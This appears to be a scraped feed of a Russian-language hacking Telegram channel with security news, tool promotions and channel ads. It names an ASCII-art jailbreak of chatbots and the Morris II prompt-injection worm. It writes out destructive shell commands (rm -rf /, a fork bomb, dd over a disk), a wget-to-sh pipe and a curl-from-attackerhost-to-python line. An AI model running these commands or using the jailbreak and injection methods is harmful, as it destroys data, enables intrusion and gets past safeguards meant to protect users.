На платформе Hugging Face обнаружено не менее 100 вредоносных Deep Learning моделей, некоторые из которых могут выполнять код на машине жертвы, предоставляя злоумышленникам постоянный бэкдор.
Специалисты компании JFrog разработали и развернули продвинутую систему сканирования для проверки моделей PyTorch и Tensorflow Keras, размещенных на Hugging Face.
Малварь проникла в Hugging Face несмотря на все меры безопасности, включая сканирование на наличие малвари, а также тщательное изучение функциональности моделей для обнаружения такого поведения, как небезопасная десериализация.
Одним из примеров стала модель PyTorch, загруженная недавно пользователем под ником
baller423 и уже удаленная с HuggingFace. Она содержала полезную нагрузку, которая позволяла создать реверс-шелл на указанный хост (210.117.212.93). Вредоносная полезная нагрузка использовала метод __reduce__ модуля pickle для выполнения произвольного кода при загрузке файла модели PyTorch, при этом избегая обнаружения за счет встраивания малвари в доверенный процесс сериализации.В JFrog обнаружили, что та же полезная нагрузка связывалась и с другими IP-адресами, что позволяет предположить, что ее операторы все же являются ИИ- и ИБ-исследователями, а не хакерами. Однако такие эксперименты в JFrog все равно называют слишком рискованными, учитывая, что опасные модели были общедоступны.
Пытаясь определить истинные намерения операторов вредоноса, аналитики развернули приманку для привлечения активности и ее анализа. Им удалось установить соединение с сервером потенциальных злоумышленников, однако не удалось перехватить ни одной команды за время поддержания соединения.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤17👍11🔥6🎉2
apt updateapt install gitgit clone https://github.com/rajkumardusad/Tool-X.gitcd Tool-Xchmod +x installsh install if not work than use ./installTool-X содержит инструменты для:
├── сбора информации
├── сканирования уязвимостей
├── инструменты эксплойта
├── тестирование беспроводных сетей
├── инструменты форензики
└── инструменты для DDOS
и ещё много всего интересного, не благодарите)
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍56❤9🔥7🤔1
🥷 Как хакнуть GPT
Исследователи раскрыли хак, как убрать из ChatGPT цензуру и заставить ИИ отвечать без ограничений со стороны разработчиков. Оказалось. что для этого нужно просто замаскировать запрос под арт ASCII.
После этого ChatGPT может сообщить различные ранее запрещённые для раскрытия инструкции и заблокированную информацию. Этот баг есть во всех популярных нейросетях — GPT-3.5, GPT-4, Gemini, Claude и Llama2.
¯\_(ツ)_/¯
@linuxkalii
Исследователи раскрыли хак, как убрать из ChatGPT цензуру и заставить ИИ отвечать без ограничений со стороны разработчиков. Оказалось. что для этого нужно просто замаскировать запрос под арт ASCII.
После этого ChatGPT может сообщить различные ранее запрещённые для раскрытия инструкции и заблокированную информацию. Этот баг есть во всех популярных нейросетях — GPT-3.5, GPT-4, Gemini, Claude и Llama2.
¯\_(ツ)_/¯
@linuxkalii
🔥50👍17❤4👎3🤬1
Группа немецких исследователей обнаружила уязвимость в DNSSEC — наборе расширений протокола DNS, которые предназначены для повышения его безопасности.
Атака KeyTrap, эксплуатирующая эту уязвимость, позволяет вывести из строя DNS-сервер, отправив ему 1 вредоносный пакет данных.
Уязвимость в DNSSEC была обнаружена пару месяцев назад и зарегистрирована как CVE-2023-50387. Ей присвоена оценка 7,5 по шкале CVSS 3.1 и уровень опасности «высокий».
Суть KeyTrap. Атакующий создает DNS-сервер, отвечающий на запросы кэширующих DNS-серверов вредоносным пакетом. Далее злоумышленник заставляет кэширующий сервер запросить DNS-запись у вредоносного DNS-сервера, который в ответ отправляет криптографически подписанную вредоносную DNS-запись. Подпись выполнена таким образом, что в процессе ее проверки атакуемый DNS-сервер зависает с загрузкой процессора 100%.
В зависимости от ПО на DNS-сервере, эта атака может заставить сервер зависнуть на срок до 16 часов. Атака KeyTrap может не только лишить доступа к веб-контенту всех клиентов DNS-сервера, но и помешать работе различных инфраструктурных сервисов, таких как защита от спама, обработка цифровых сертификатов (PKI) и безопасная междоменная маршрутизация (RPKI).
KeyTrap называют «самой серьезной из атак на DNS-серверы». Интересно, что изъяны в логике проверки подписи, которые делают эту атаку возможной, обнаружены еще в одной из самых ранних версий спецификации DNSSEC, опубликованной аж в 1999 году.
Исследователи уведомили всех разработчиков программного обеспечения для DNS-серверов и крупнейших публичных DNS-провайдеров. Закрывающие уязвимость CVE-2023-50387 обновления и рекомендации по безопасности уже доступны для PowerDNS, NLnet Labs Unbound и Internet Systems Consortium BIND9. Так что если вы администрируете DNS-сервер, самое время накатить обновления.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
❤22👍7🔥6😱4
Wifiphisher — это инструмент для создания ложной точки доступа; предназначен для RedTeam или тестирования безопасности Wi-Fi.
С помощью Wifiphisher пентестеры могут легко устроить MITM против беспроводных клиентов, выполняя направленные атаки Wi-Fi.
Wifiphisher также может использоваться для организации фишинговых атак, настраиваемых для жертвы, для захвата учетных данных подключенных клиентов (например, со страниц входа сторонних сервисов или предустановленных ключей WPA/WPA2) или для инфицирования жертвы вредоносным программным обеспечением.
Фичи Wifiphisher
./bin/wifiphisher. Интерактивный текстовый пользовательский интерфейс помогает удобно настраивать атаку.Пользуйтесь на здоровье)
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍46❤9🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
Взломщик показал, как взламывает светофоры с помощью девайса
Flipper Zero и теперь всегда может ехать «на зелёный».@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥70😁34❤9👎8👍6👏1
Sucuri предупреждает, что хакеры проводят атаки на сайты под управлением WordPress и внедряют скрипты, которые заставляют брутфорсить пароли для других сайтов.
Стоящие за этим хакеры обычно взламывают сайты, чтобы внедрять на них скрипты для угона криптокошельков. Их скрипты отображают мошеннические сообщения. Если человек попадается, скрипты похищают все активы в его кошельке.
Обычно хакеры использовали сайты на WordPress, внедряя на них AngelDrainer. Атаки осуществлялись несколькими волнами с различных URL, последним был
dynamiclink[.]lol/cachingjs/turboturbo.js.Однако теперь мошенники используют браузеры посетителей для брутфорса других WordPress-сайтов, применяя для этого вредоносный скрипт с недавно зарегистрированного домена
dynamic-linx[.]com/chx.js.То есть злоумышленники взламывают сайт под управлением WordPress и внедряют в его HTML-шаблоны вредоносный код. Когда посетители заходят на такой сайт, в их браузер загружаются скрипты с
https://dynamic-linx[.]com/chx.js.Эти скрипты вынуждают браузеры жертв связываться с сервером хакеров (
https://dynamic-linx[.]com/getTask.php) и получать задание на перебор паролей. Оно поставляется в виде JSON-файла, содержащего необходимые параметры для атаки: ID, URL сайта, имя учетной записи, число, обозначающее текущую партию паролей для перебора, а также сто паролей для пробы.При получении задания браузер жертвы загружает файл через XMLRPC-интерфейс WordPress, используя имя учетной записи и пароль из JSON. Если пароль подобран правильно, скрипт уведомит своих операторов о том, что пароль для сайта найден.
По данным PublicHTML, в настоящее время такими скриптами заражены более 1700 сайтов. К примеру, в числе взломанных ресурсов можно найти даже сайт Ассоциации частных банков Эквадора.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍46🔥6❤5😁2🤔2
🔥Подборка лучших обучающих каналов для программистов.
➡️ Делитесь с коллегами и cохраняйте себе, чтобы не потерять
⚡️ Frontend
Javascript академия - крупнейший js канал
React - лучшие гайды и советы по работе с react
Frontend - тутрориалы, уроки, гайды, код
PHP
Книги frontend
Задачи frontend
💥 Хакинг Kali Linux
Kali linux
linux_kal - kali чат
Информационная безопасность
🚀 Data Science
Анализ данных - полезные фишки, код, гайды и советы, маст-хэв датасаентиста
Data Jobs - ds вакансии
Аналитик данных
Data Science книги - актуальные бесплатные книги
Big data
#️⃣C#
С# академия
С# заметки — код, лучшие практики, заметки программиста c#
С# задачи и тесты
С# библиотека - актуальные бесплатные книги
C# вакансии - работа
⚡Машинное обучение
Ml Собеседование - подготовка к собеседовению мл, алгоритмам, кодингу
Ml ru - актуальные статьи, новости, код и обучающие материалы
Ml Jobs - вакансии ML
ML Книги - актуальные бесплатные книги МО
ML чат
Machine Learning - полезные статьи новости гайды и разбор кода
🏆 Golang
Golang - подробные гайды, разбор кода, лучшие практики, заметки
Golang собеседование
Golang вакансии
Golang книги
Golang задачи и тесты
Golang чат
Golang news - новости go
🐍 Python
Python/django
Python Собеседование - подготовка к собеседовению python и разбор алгоритмов
Pro python - статьи, новости, код и обучающие материалы
Python Jobs - вакансии Python
Python чат
Python книги
☕ Java
Java академия
Java вакансии
Java чат
Java вопросы с собеседований
Java книги
🛢Базы данных
Sql базы данных
Библиотека баз данных
SQL чат
💻 C++
C++ академия
С++ книги
C++ задачи - подготовка к собеседовению мл, алгоритмам
C++ вакансии
🐧 Linux
Linux academy
🦀 Rust
Rust программирование
Rust чат
Rust книги для программистов
📲 Мобильная разработка
Android разработка
Мобильный разработчик гайды и уроки
🇬🇧 Английский для программистов
🧠 Искусственный интеллект
ИИ и технологии
Neural - нейросети для работы и жизни
Книги ИИ
Artificial Intelligence
🔥 DevOPs
Devops для программистов
Книги Devops
🌟 Docker/Kubernets
Docker
Kubernets
📓 Книги
Библиотеки Книг для программситов
💼 Папка с вакансиями:
Папка Go разработчика:
Папка Python разработчика:
Папка Data Science
Папка Java разработчика
Папка C#
Папка Frontend
➡️ Делитесь с коллегами и cохраняйте себе, чтобы не потерять
⚡️ Frontend
Javascript академия - крупнейший js канал
React - лучшие гайды и советы по работе с react
Frontend - тутрориалы, уроки, гайды, код
PHP
Книги frontend
Задачи frontend
💥 Хакинг Kali Linux
Kali linux
linux_kal - kali чат
Информационная безопасность
🚀 Data Science
Анализ данных - полезные фишки, код, гайды и советы, маст-хэв датасаентиста
Data Jobs - ds вакансии
Аналитик данных
Data Science книги - актуальные бесплатные книги
Big data
#️⃣C#
С# академия
С# заметки — код, лучшие практики, заметки программиста c#
С# задачи и тесты
С# библиотека - актуальные бесплатные книги
C# вакансии - работа
⚡Машинное обучение
Ml Собеседование - подготовка к собеседовению мл, алгоритмам, кодингу
Ml ru - актуальные статьи, новости, код и обучающие материалы
Ml Jobs - вакансии ML
ML Книги - актуальные бесплатные книги МО
ML чат
Machine Learning - полезные статьи новости гайды и разбор кода
🏆 Golang
Golang - подробные гайды, разбор кода, лучшие практики, заметки
Golang собеседование
Golang вакансии
Golang книги
Golang задачи и тесты
Golang чат
Golang news - новости go
🐍 Python
Python/django
Python Собеседование - подготовка к собеседовению python и разбор алгоритмов
Pro python - статьи, новости, код и обучающие материалы
Python Jobs - вакансии Python
Python чат
Python книги
☕ Java
Java академия
Java вакансии
Java чат
Java вопросы с собеседований
Java книги
🛢Базы данных
Sql базы данных
Библиотека баз данных
SQL чат
💻 C++
C++ академия
С++ книги
C++ задачи - подготовка к собеседовению мл, алгоритмам
C++ вакансии
🐧 Linux
Linux academy
🦀 Rust
Rust программирование
Rust чат
Rust книги для программистов
📲 Мобильная разработка
Android разработка
Мобильный разработчик гайды и уроки
🇬🇧 Английский для программистов
🧠 Искусственный интеллект
ИИ и технологии
Neural - нейросети для работы и жизни
Книги ИИ
Artificial Intelligence
🔥 DevOPs
Devops для программистов
Книги Devops
🌟 Docker/Kubernets
Docker
Kubernets
📓 Книги
Библиотеки Книг для программситов
💼 Папка с вакансиями:
Папка Go разработчика:
Папка Python разработчика:
Папка Data Science
Папка Java разработчика
Папка C#
Папка Frontend
👍24❤5🔥5
Обожаю Linux за его гибкость и безграничные возможности)
rm -rf / – Эта команда удалит все файлы и папки на вашем компьютере.:(){ :|: & };: – Это команда, также известная как "fork bomb", может вызвать переполнение памяти на вашем компьютере и привести к аварийному завершению системы.mkfs.ext4 /dev/sda – Эта команда форматирует жесткий диск без какого-либо предупреждения или подтверждения. Все данные будут утеряны.dd if=/dev/random of=/dev/sda – Эта команда перезапишет все данные на жестком диске случайными значениями, что приведет к потере данных.chmod 777 / – Эта команда откроет полный доступ к вашей файловой системе для всех пользователей, что может привести к нарушению безопасности.mv /home/* /dev/null – Эта команда переместит все файлы в вашей домашней директории в "null", короче, они будут утеряны.wget http://example.com/file -O /dev/null – Эта команда загрузит файл и перезапишет все данные в "null", что приведет к потере данных.mkfs.ext4 /dev/sda1 – Эта команда форматирует раздел жесткого диска без какого-либо предупреждения или подтверждения. Все данные на этом разделе будут утеряны.ln -s /dev/null /etc/passwd – Эта команда создаст символическую ссылку на "/etc/passwd" в "null", что приведет к потере данных.echo "Hello" > /dev/sda – это заменит ваш раздел, содержащий все данные, необходимые для загрузки системы, строкой «Hello».wget http://malicious_source -O- | sh – Такие команды будут загружать и запускать в вашей системе вредоносные сценарии, которые могут подорвать безопасность вашей системы.В общем, берите ненужный комп — и да начнётся веселье
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍58🔥20❤11👎2
🚀 Cybersecurity for Beginners – a curriculum
Microsoft выпустила крутейший курс. Совешенно бесплатно Security-101 для изучения основ кибербезопасности.
Он подойдёт всем, кто желает ознакомиться с базовыми принципами защиты от киберугроз.
Всего доступно семь уроков со статьями, видео и дополнительными материалами.
📌 Курс
@linuxkalii
Microsoft выпустила крутейший курс. Совешенно бесплатно Security-101 для изучения основ кибербезопасности.
Он подойдёт всем, кто желает ознакомиться с базовыми принципами защиты от киберугроз.
Всего доступно семь уроков со статьями, видео и дополнительными материалами.
📌 Курс
@linuxkalii
👍32🔥9❤3
Social engineering books - книги по хакингу и информационной безопасностb
Linux academy - лайхаки, полезные инструменты для работы с linux
Linux books - полезные и актуальные книги о Linux.
Вакансии сетевого администратора
Linux academy - лайхаки, полезные инструменты для работы с linux
Linux books - полезные и актуальные книги о Linux.
Вакансии сетевого администратора
👍18❤6🔥2
— новая гроза почтовых клиентов с AI-фичами
Группа исследователей из Израильского технологического института и компании Intuit разработали червя Morris II, который заточен на атаки нейросетевых приложений и почтовых клиентов с поддержкой нейросетевых функций. Morris II способен красть личные данные, внедрять вредоносное ПО, спамить пользователей и распространяться через несколько связанных сервисов.
Исследование демонстрирует, что злоумышленники могут использовать запросы (например, в обычном письме), которые при обработке генеративной нейросетью заставляют её воспроизводить входные данные в качестве выходных и совершать вредоносные действия. Червь был протестирован против трёх различных моделей — Gemini Pro, ChatGPT 4.0 и LLaVA, а также оценены различные факторы (например, скорость распространения, репликация, вредоносная активность), влияющие на его эффективность.
В данный момент речь идёт о научном исследовании в искусственно созданной среде, и, по словам авторов, пока нет признаков того, что подобные черви уже действуют в интернете, но это лишь вопрос времени. Команда сообщила о своих результатах в Google и OpenAI.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤3🔥3😁2
Учите Python, он везде)
1 шаг — установка внешних библиотек
pip install python-decouple opencv-python pyzbar IMAPClientdecouple — для чтения данных из файлаopencv — для чтения изображения с QR-кодом pyzbar — чтобы прочитать данные, закодированные в QR-кодеIMAPClient — с помощью неё будем работать с сообщениями на почтовом сервереТак как мы будем использовать пароль приложений, а также логин от аккаунта Google, то в коде его желательно не использовать. Поэтому, необходимо создать файл «.env» с примерным содержимым:
login = "test@gmail.com"
pwd = "gffg sbbp jccj vhhi"
2 шаг — импорт библиотек
3 шаг — считывание данных из QR-кода
4 шаг — отправка письма
5 шаг — чтение почты
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍23❤7🔥3
Windows Matrix UHD.png
3.6 MB
На вскидку здесь их 200+, не считал
Всё удобненько сгруппировано, чтобы можно было сориентироваться и сразу понять, как...
...тестировать свою Windows, а иначе для чего это всё
Ну вы понимаете)
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍40❤7🔥7👎2😁1
Годная статья, в которой описываются разные техники повышения привилегий и закрепления в системе.
— «На одном из недавних проектов мы обнаружили возможность записывать данные в папку веб-сервера IIS без авторизации. Мы сделали ASPX-файл, загрузили его на сервер и обратились к нему через браузер. Таким образом мы получили возможность исполнять команды в рамках контекста веб-сервера, а он, так же, как MS SQL, имеет привилегию имперсонализации. Мы сделали имперсонализацию и поднялись до системных привилегий. Создали себе учетную запись, зашли на этот веб-сервер через парадную дверь и начали продвигаться по инфраструктуре.»
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍32🔥8❤7
13 марта 2013 года был выпущен Kali Linux
С прошедшим днем рождения любимый дистрибутив хакеров 🎂 👾
@linuxkalii
С прошедшим днем рождения любимый дистрибутив хакеров 🎂 👾
@linuxkalii
👍111🎉40❤21🔥6
Разработчики Tor Project объявили о запуске новой функции — мостов WebTunnel, которые работают на основе устойчивого к обнаружению HTTPT-прокси и позволяют трафику Tor лучше смешиваться с обычным HTTPS-трафиком.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍32🔥8❤7
This media is not supported in your browser
VIEW IN TELEGRAM
Данный инструмент предназначен для автоматической эскалации привилегий в Unix‑подобных системах через команду
sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.Основные особенности:
curl http://attackerhost/gtfonow.py | python@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
❤15👍8🔥4🤯2